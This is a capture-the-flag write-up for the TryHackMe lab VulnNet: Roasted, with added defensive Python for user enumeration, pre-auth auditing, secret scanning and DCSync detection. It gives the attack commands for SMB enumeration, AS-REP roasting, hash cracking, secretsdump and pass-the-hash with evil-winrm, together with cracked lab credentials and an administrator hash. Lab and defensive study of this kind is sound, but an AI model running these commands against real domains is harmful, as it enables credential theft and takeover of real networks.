VulnNet: Roasted

This is my write-up for the machine on TryHackMe known as VulnNet: Roasted:

I am going to start off by running the following nmap scan:

nmap -T4 -A -vvv -Pn -oN nmap.output

I then got the following result from the search:

# Nmap 7.91 scan initiated Sat Jul 24 15:18:10 2021 as: nmap -T4 -A -vvv -Pn -oN nmap.output
Increasing send delay for from 0 to 5 due to 25 out of 62 dropped probes since last increase.
Nmap scan report for
Host is up, received user-set (0.16s latency).
Scanned at 2021-07-24 15:18:11 EDT for 69s
Not shown: 995 closed ports
Reason: 995 conn-refused
135/tcp  filtered msrpc          no-response
139/tcp  filtered netbios-ssn    no-response
593/tcp  filtered http-rpc-epmap no-response
636/tcp  filtered ldapssl        no-response
3389/tcp filtered ms-wbt-server  no-response

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
# Nmap done at Sat Jul 24 15:19:20 2021 -- 1 IP address (1 host up) scanned in 70.18 seconds

My next step was to look at what each of the ports had on it using the browser. I was getting this message:

I looked at this write-up to compare the nmap results, and changed my scan to the following:

nmap -T5 -sV -sC -T4 -Pn

I then got a different result:

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( ) at 2021-07-24 15:23 EDT
Nmap scan report for
Host is up (0.17s latency).
Not shown: 990 filtered ports
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-24 19:24:08Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -11s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-24T19:24:27
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 102.05 seconds

Running smbmap (an idea I got from the write-up mentioned previously) on the IP address got me the following result:

I then looked on to see what the author would do in this case. I ended up using this site to connect to the SMB share with the following command:

smbclient //

I then got this output:

I then downloaded those files using mget *:

I did see a couple of names in the files, which could potentially be usernames we can exploit later:

I then downloaded the other files from the other share:

There were names that stood out on these files as well:

I then wanted to know where I would go from here. Viewing the site from before, I realized that I would have to brute-force SIDs. I used the Metasploit version (this takes 5-10 minutes):

msf6 > use auxiliary/scanner/smb/smb_lookupsid
msf6 auxiliary(scanner/smb/smb_lookupsid) > set rhosts
rhosts =>
msf6 auxiliary(scanner/smb/smb_lookupsid) > run

[*]     - PIPE(LSARPC) LOCAL(VULNNET-RST - 5-21-1589833671-435344116-4136949213) DOMAIN(VULNNET-RST - 5-21-1589833671-435344116-4136949213)
[*]     - USER=Administrator RID=500
[*]     - USER=Guest RID=501
[*]     - USER=krbtgt RID=502
[*]     - GROUP=Domain Admins RID=512
[*]     - GROUP=Domain Users RID=513
[*]     - GROUP=Domain Guests RID=514
[*]     - GROUP=Domain Computers RID=515
[*]     - GROUP=Domain Controllers RID=516
[*]     - TYPE=4 NAME=Cert Publishers rid=517
[*]     - GROUP=Schema Admins RID=518
[*]     - GROUP=Enterprise Admins RID=519
[*]     - GROUP=Group Policy Creator Owners RID=520
[*]     - GROUP=Read-only Domain Controllers RID=521
[*]     - GROUP=Cloneable Domain Controllers RID=522
[*]     - GROUP=Protected Users RID=525
[*]     - GROUP=Key Admins RID=526
[*]     - GROUP=Enterprise Key Admins RID=527
[*]     - TYPE=4 NAME=RAS and IAS Servers rid=553
[*]     - TYPE=4 NAME=Allowed RODC Password Replication Group rid=571
[*]     - TYPE=4 NAME=Denied RODC Password Replication Group rid=572
[*]     - USER=WIN-2BO8M1OE1M1$ RID=1000
[*]     - TYPE=4 NAME=DnsAdmins rid=1101
[*]     - GROUP=DnsUpdateProxy RID=1102
[*]     - USER=enterprise-core-vn RID=1104
[*]     - USER=a-whitehat RID=1105
[*]     - USER=t-skid RID=1109
[*]     - USER=j-goldenhand RID=1110
[*]     - USER=j-leet RID=1111

I then copied that into a file and ran grep on it to print only the list of users:

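Added example (not part of the original write-up): a small parser for the smb_lookupsid output format shown above, which does the same job as the grep but keeps the kind of each principal and its RID. The sample text is constructed from the lines on this page; machine accounts are dropped from the user list by default because they are not what the next step needs.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample in the format smb_lookupsid prints above; the names and RIDs
# are the ones shown on this page, trimmed to a few lines.
SAMPLE = """\
[*]     - PIPE(LSARPC) LOCAL(VULNNET-RST - 5-21-1589833671-435344116-4136949213) DOMAIN(VULNNET-RST - 5-21-1589833671-435344116-4136949213)
[*]     - USER=Administrator RID=500
[*]     - USER=Guest RID=501
[*]     - USER=krbtgt RID=502
[*]     - GROUP=Domain Admins RID=512
[*]     - TYPE=4 NAME=Cert Publishers rid=517
[*]     - USER=WIN-2BO8M1OE1M1$ RID=1000
[*]     - USER=enterprise-core-vn RID=1104
[*]     - USER=t-skid RID=1109
"""


@dataclass(frozen=True)
class Principal:
    kind: str   # "USER", "GROUP" or "ALIAS" (the TYPE=4 lines: built-in/local groups)
    name: str
    rid: int


# USER= and GROUP= lines spell the RID as "RID=", TYPE=4 lines as "rid=".
_USER_GROUP = re.compile(r"-\s+(USER|GROUP)=(.+?) RID=(\d+)\s*$")
_ALIAS = re.compile(r"-\s+TYPE=4 NAME=(.+?) rid=(\d+)\s*$")
_DOMAIN = re.compile(r"DOMAIN\((\S+) - (\S+)\)")


def parse_lookupsid(text: str) -> List[Principal]:
    """Every principal the module resolved, in output order."""
    found: List[Principal] = []
    for line in text.splitlines():
        m = _USER_GROUP.search(line)
        if m:
            found.append(Principal(m.group(1), m.group(2), int(m.group(3))))
            continue
        m = _ALIAS.search(line)
        if m:
            found.append(Principal("ALIAS", m.group(1), int(m.group(2))))
    return found


def domain_sid(text: str) -> Optional[Tuple[str, str]]:
    """(NetBIOS domain name, SID as the module prints it) from the DOMAIN(...) line."""
    m = _DOMAIN.search(text)
    return (m.group(1), m.group(2)) if m else None


def user_names(text: str, include_machine: bool = False) -> List[str]:
    """Only the USER entries: the list the grep in the write-up produces.

    Machine accounts (trailing "$") are dropped by default; they are not
    user accounts and only add noise to a users file.
    """
    return [p.name for p in parse_lookupsid(text)
            if p.kind == "USER" and (include_machine or not p.name.endswith("$"))]


def nonstandard_users(text: str) -> List[str]:
    """USER entries with RID >= 1000: accounts created after the domain was built.

    RIDs below 1000 are reserved for well-known accounts and groups, so this
    is the quickest way to separate admin-created accounts from built-ins.
    """
    return [p.name for p in parse_lookupsid(text)
            if p.kind == "USER" and p.rid >= 1000 and not p.name.endswith("$")]


if __name__ == "__main__":
    print("\n".join(user_names(SAMPLE)))
```

Running it prints one username per line, the same shape of users file the Impacket step below consumes.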
For some reason, the Impacket install on my Kali Linux machine was lacking a lot of scripts. I then cloned the following repository: I noticed a couple of write-ups referring to it, so I decided to give that a try as well. I ran the following command to try to get hashes for the users:

python3 ../resources/impacket/examples/ -dc-ip  -usersfile user.txt vulnnet-rst.local/ 

In the previous command, vulnnet-rst.local resolves to the IP address of the machine; I had just added that mapping in /etc/hosts. I got the following result:

Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set

I then realized that I would have to crack the hash in the output. My assumption was that this is a Kerberos hash. Looking on, I found out that this is Kerberos 5, and the hashcat mode for it is 18200. I then tried to crack it using hashcat:

hashcat -m 18200 hash ../resources/rockyou.txt --force

The hash was then cracked:

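Added example (not from the original write-up) showing why this step worked: the Impacket output above reports, per user, whether UF_DONT_REQUIRE_PREAUTH is set in that account's userAccountControl attribute. An account with that bit set and not disabled lets anyone obtain an AS-REP encrypted with the account's password-derived key, which is what hashcat mode 18200 cracks. The code audits a constructed export of sAMAccountName to userAccountControl (the flag values are assumptions chosen so that only t-skid lacks pre-auth, matching the output above; svc-disabled is an invented account showing the disabled case) and computes the corrected value.

```python
from typing import Dict, List

# Bit values of the userAccountControl attribute (Microsoft's documented flags).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}

# Constructed sample: sAMAccountName -> userAccountControl, the shape an export of
# that single attribute gives you. Names are the ones enumerated on this page
# except svc-disabled (made up); the values are assumptions for the example.
SAMPLE_ACCOUNTS: Dict[str, int] = {
    "Administrator": 0x10200,
    "Guest": 0x10202,
    "krbtgt": 0x202,
    "enterprise-core-vn": 0x10200,
    "a-whitehat": 0x10200,
    "t-skid": 0x410200,        # pre-auth not required: the roastable one
    "j-goldenhand": 0x200,
    "j-leet": 0x200,
    "svc-disabled": 0x400202,  # bit set but account disabled: KDC refuses it
}


def decode_uac(uac: int) -> List[str]:
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(FLAG_NAMES.items()) if uac & bit]


def preauth_not_required(uac: int) -> bool:
    """True when the KDC answers an AS-REQ for this account without pre-authentication."""
    return bool(uac & UF_DONT_REQUIRE_PREAUTH)


def asrep_roastable(accounts: Dict[str, int]) -> List[str]:
    """Enabled accounts whose AS-REP anyone can request: the material hashcat cracks."""
    return sorted(sam for sam, uac in accounts.items()
                  if preauth_not_required(uac) and not uac & UF_ACCOUNTDISABLE)


def fixed_uac(uac: int) -> int:
    """Value to write back to close the exposure: same flags, pre-auth bit cleared."""
    return uac & ~UF_DONT_REQUIRE_PREAUTH


def audit_report(accounts: Dict[str, int]) -> List[str]:
    """One line per account: name, raw value, verdict and decoded flags."""
    exposed = set(asrep_roastable(accounts))
    lines: List[str] = []
    for sam, uac in sorted(accounts.items()):
        verdict = "ROASTABLE" if sam in exposed else "ok"
        lines.append(f"{sam:<20} 0x{uac:06x} {verdict:<9} " + "|".join(decode_uac(uac)))
    return lines


if __name__ == "__main__":
    print("\n".join(audit_report(SAMPLE_ACCOUNTS)))
```

Clearing the bit makes the KDC demand a timestamp encrypted with the user's key before it returns anything, so there is no crackable material to collect without already knowing the password.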
I then plugged that information into smbmap:

└─$ smbmap -H -u t-skid -p 'tj072889*'
[+] IP: Name:                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
        VulnNet-Business-Anonymous                              READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous                            READ ONLY       VulnNet Enterprise Sharing

I noticed that there were more READ ONLY shares available to this user. I then wanted to see what those files were:

Viewing the .vbs file showed me a username and password:

I then did smbmap using this username and password:

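Added example (not from the original write-up): the credential in the .vbs file is the kind of thing a periodic scan of NETLOGON and SYSVOL should catch before anyone else does. The scanner below runs two rules over files pulled from a share (quoted assignments to password-like variables, and net use lines carrying /user: plus a password) and reports masked values. The sample files, paths, server name and svc-map account are constructed for the example; only the a-whitehat account name comes from this page.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Finding:
    file: str
    line_no: int
    rule: str
    label: str     # variable name or account the secret belongs to
    secret: str    # masked, so the report itself does not leak it


# Each rule captures (label, secret). Rule 1 covers VBScript/PowerShell/batch
# assignments such as strPassword = "..."; rule 2 covers net use ... /user:X pw.
# A net use line with the password before /user: is not covered by rule 2.
RULES = [
    ("quoted-password-assignment",
     re.compile(r'(?i)\b(\w*(?:pass(?:word|wd)?|pwd)\w*)\s*=\s*"([^"]*)"')),
    ("net-use-credential",
     re.compile(r'(?i)\bnet\s+use\b[^\n]*?/user:(\S+)\s+(\S+)')),
]


def mask(secret: str) -> str:
    """Keep the first character so findings can be matched up, hide the rest."""
    return secret[:1] + "*" * (len(secret) - 1) if secret else ""


def scan_text(name: str, text: str) -> List[Finding]:
    out: List[Finding] = []
    for n, line in enumerate(text.splitlines(), 1):
        for rule, rx in RULES:
            m = rx.search(line)
            if m:
                out.append(Finding(name, n, rule, m.group(1), mask(m.group(2))))
    return out


def scan_share(files: Dict[str, str]) -> List[Finding]:
    """Scan every file pulled from a share (path -> contents), in path order."""
    return [f for name, text in sorted(files.items()) for f in scan_text(name, text)]


# Constructed sample share contents. The VBScript is modelled on a password-reset
# script of the kind found on the NETLOGON share above: the account name is the
# one this write-up recovers, the script body and secret are made up. The batch
# file, fs01 and svc-map are invented; the .ps1 line is a near-miss that must
# not be reported (a flag named like a password, not a secret).
SAMPLE_FILES: Dict[str, str] = {
    "NETLOGON/reset-password.vbs": "\n".join([
        "Option Explicit",
        "Dim strUserNTName, strPassword",
        'strUserNTName = "a-whitehat"',
        'strPassword = "s3cret-example"',
        "' ... password reset logic would follow here",
    ]),
    "NETLOGON/map-drives.bat": "\n".join([
        "@echo off",
        r"net use H: \\fs01\home /user:VULNNET-RST\svc-map Winter2021!",
    ]),
    "SYSVOL/scripts/logon.ps1": "\n".join([
        "$PasswordNeverExpires = $true",
        'Write-Host "Welcome"',
    ]),
}


if __name__ == "__main__":
    for f in scan_share(SAMPLE_FILES):
        print(f"{f.file}:{f.line_no} [{f.rule}] {f.label} -> {f.secret}")
```

The masking is deliberate: a findings report that reproduces the secret is itself another copy of the secret on disk.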
I first used smbclient to get into the C$ share. After not finding anything for a while, I looked at this write-up. I then realized that I had to use Impacket again in order to get the hashes for the other users. First, I ran crackmapexec:

└─$ crackmapexec smb -u a-whitehat -p bNdKVkjv3RR9ht                 
SMB     445    WIN-2BO8M1OE1M1  [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB     445    WIN-2BO8M1OE1M1  [+] vulnnet-rst.local\a-whitehat:bNdKVkjv3RR9ht (Pwn3d!)

I then used the credentials that crackmapexec had marked "Pwn3d!" in the Impacket command:

└─$ python3 ../resources/impacket/examples/ vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] NL$KM 
 0000   F3 F6 6B 8D 1E 2A F4 8E  85 F6 7A 46 D1 25 A0 D3   ..k..*....zF.%..
 0010   EA F4 90 7D 2D CB A5 8C  88 C5 68 4C 1E D3 67 3B   ...}-.....hL..g;
 0020   DB 31 D9 91 C9 BB 6A 57  EA 18 2C 90 D3 06 F8 31   .1....jW..,....1
 0030   7C 8C 31 96 5E 53 5B 85  60 B4 D5 6B 47 61 85 4A   |.1.^S[.`..kGa.J
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
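Added example (not from the original write-up): the "Using the DRSUAPI method to get NTDS.DIT secrets" line above means the tool asked the domain controller to replicate the directory to it, the way another DC would. With "Audit Directory Service Access" enabled and a SACL on the domain object for the replication rights, the DC logs event 4662 for each such request, and the Properties field carries the extended-right GUIDs. The rule below runs over constructed 4662 records and flags replication reads by anything that is not a known domain controller. The GUIDs are the real extended-right GUIDs; the event records, the KNOWN_DCS allow-list and the object GUID placeholder are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set, Tuple

# Extended rights whose GUIDs show up in the Properties field of event 4662
# when a principal pulls directory changes the way a replication partner does.
# Get-Changes-All is the one that allows secret attributes to be returned.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

_GUID = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)


@dataclass(frozen=True)
class Alert:
    subject: str
    domain: str
    rights: Tuple[str, ...]


def replication_rights(properties: str) -> List[str]:
    """Names of the replication rights present in a 4662 Properties value."""
    return [REPLICATION_RIGHTS[g.lower()] for g in _GUID.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events: Iterable[Dict[str, str]], known_dcs: Set[str]) -> List[Alert]:
    """Flag replication-style reads by anything other than a domain controller."""
    alerts: List[Alert] = []
    for ev in events:
        if ev.get("EventID") != "4662":
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue  # ordinary object access, not replication
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in known_dcs:
            continue  # DC-to-DC replication is expected traffic
        alerts.append(Alert(subject, ev.get("SubjectDomainName", ""), tuple(rights)))
    return alerts


# Machine accounts allowed to replicate. The only DC on this page is
# WIN-2BO8M1OE1M1; in production this list comes from the Domain Controllers OU.
KNOWN_DCS = {"WIN-2BO8M1OE1M1$"}

# Constructed 4662 records reduced to the fields the rule reads. AccessMask 0x100
# is Control Access, 0x10 is Read Property; the all-zero GUID is a placeholder.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # normal replication by the DC's own account
        "EventID": "4662", "SubjectUserName": "WIN-2BO8M1OE1M1$",
        "SubjectDomainName": "VULNNET-RST", "AccessMask": "0x100",
        "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # what the DRSUAPI dump above looks like from the DC's side
        "EventID": "4662", "SubjectUserName": "a-whitehat",
        "SubjectDomainName": "VULNNET-RST", "AccessMask": "0x100",
        "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # an ordinary object read by a user: no replication right in Properties
        "EventID": "4662", "SubjectUserName": "j-leet",
        "SubjectDomainName": "VULNNET-RST", "AccessMask": "0x10",
        "Properties": "%%7688\n\t{00000000-0000-0000-0000-000000000000}",
    },
    {   # a different event type carrying the same GUID must be ignored
        "EventID": "4624", "SubjectUserName": "a-whitehat",
        "SubjectDomainName": "VULNNET-RST",
        "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
]


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS, KNOWN_DCS):
        print(f"DCSync-style read by {a.domain}\\{a.subject}: {', '.join(a.rights)}")
```

The RemoteRegistry start and stop lines in the output above are a second, host-side trace of the same run: the DC's System log records those service state changes under Service Control Manager event 7036, and a domain controller whose RemoteRegistry service is started by a user account is worth a look on its own.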

Using the same write-up, I learned about evil-winrm. I then used that to try to get a foothold on the machine:

evil-winrm -i -u administrator -H c2597747aa5e43022a3a3049a3c3b09d

I then got into the machine! When I looked in C:\Users\Administrator\Desktop I found the system.txt file. I then realized that I had to look for the user.txt file next. I found the user.txt file in C:\Users\enterprise-core-vn\Desktop. I then had both flags:
